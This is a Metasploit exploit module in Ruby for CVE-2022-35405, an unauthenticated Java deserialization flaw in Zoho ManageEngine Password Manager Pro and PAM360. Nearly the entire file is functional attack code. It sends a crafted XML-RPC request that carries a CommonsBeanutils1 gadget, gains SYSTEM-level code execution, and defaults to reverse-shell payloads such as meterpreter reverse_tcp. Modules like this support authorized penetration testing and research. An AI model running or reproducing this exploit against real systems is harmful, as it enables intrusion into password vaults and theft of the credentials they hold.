##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::JavaDeserialization

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Zoho Password Manager Pro XML-RPC Java Deserialization',
        'Description' => %q{
          This module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro
          before 12101 and PAM360 before 5510. Unauthenticated attackers can send a
          crafted XML-RPC request containing malicious serialized data to /xmlrpc to
          gain RCE as the SYSTEM user.
        },
        'Author' => [
          'Vinicius', # Discovery
          'Y4er', # Writeup
          'Grant Willcox' # Exploit
        ],
        'References' => [
          ['CVE', '2022-35405'],
          ['URL', 'https://xz.aliyun.com/t/11578'], # Writeup
          ['URL', 'https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html'], # Advisory
          ['URL', 'https://archives2.manageengine.com/passwordmanagerpro/12101/ManageEngine_PasswordManager_Pro_12100_to_12101.ppm'] # The patch.
        ],
        'DisclosureDate' => '2022-06-24', # Vendor release date of patch and new installer, as advisory lacks any date.
        'License' => MSF_LICENSE,
        'Platform' => ['win'],
        'Privileged' => true,
        'Targets' => [
          [
            'Windows EXE Dropper',
            {
              'Arch' => ARCH_X64,
              'Type' => :windows_dropper,
              'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Windows Command',
            {
              'Arch' => ARCH_CMD,
              'Type' => :windows_command,
              'Space' => 3000,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' }
            }
          ],
          [
            'Windows Powershell',
            {
              'Arch' => ARCH_X64,
              'Type' => :windows_powershell,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp' }
            }
          ]
        ],
        'DefaultTarget' => 1,
        'DefaultOptions' => {
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      Opt::RPORT(7272),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    # Send an empty serialized object
    res = send_request_xmlrpc('')

    unless res
      return CheckCode::Unknown('Target did not respond to check.')
    end

    if res.body.include?('Failed to read result object: null')
      return CheckCode::Vulnerable('Target can deserialize arbitrary data.')
    end

    CheckCode::Safe('Target cannot deserialize arbitrary data.')
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :windows_command
      execute_command(payload.encoded)
    when :windows_dropper
      cmd_target = targets.select { |target| target['Type'] == :windows_command }.first
      execute_cmdstager({ linemax: cmd_target.opts['Space'] })
    when :windows_powershell
      execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
    end
  end

  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}")

    res = send_request_xmlrpc(
      generate_java_deserialization_for_command('CommonsBeanutils1', 'cmd', cmd)
    )

    unless res && res.code == 200
      fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
    end

    print_good("Successfully executed command: #{cmd}")
  end

  def send_request_xmlrpc(data)
    # http://xmlrpc.com/
    # https://ws.apache.org/xmlrpc/
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/xmlrpc'),
      'ctype' => 'text/xml',
      'data' => <<~XML
        <?xml version="1.0"?>
        <methodCall>
          <methodName>#{rand_text_alphanumeric(8..42)}</methodName>
          <params>
            <param>
              <value>
                <struct>
                  <member>
                    <name>#{rand_text_alphanumeric(8..42)}</name>
                    <value>
                      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">#{Rex::Text.encode_base64(data)}</serializable>
                    </value>
                  </member>
                </struct>
              </value>
            </param>
          </params>
        </methodCall>
      XML
    )
  end

end
